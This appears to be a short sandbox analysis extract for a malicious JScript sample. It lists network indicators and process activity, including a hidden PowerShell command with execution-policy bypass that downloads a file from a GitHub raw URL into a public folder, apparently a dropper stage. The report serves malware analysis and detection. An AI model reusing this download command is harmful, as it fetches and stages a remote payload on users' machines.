Technical Information
- https://raw.githubusercontent.com/tobaletaki/tahoo/main/m3.txt as c:\users\public\libraries\m3.txt
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/tobaletaki/tahoo/main/m3.txt', 'C:\Users\Public\Libraries\m3.txt');$AnyF = Get-Co...' (with hidden window)
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"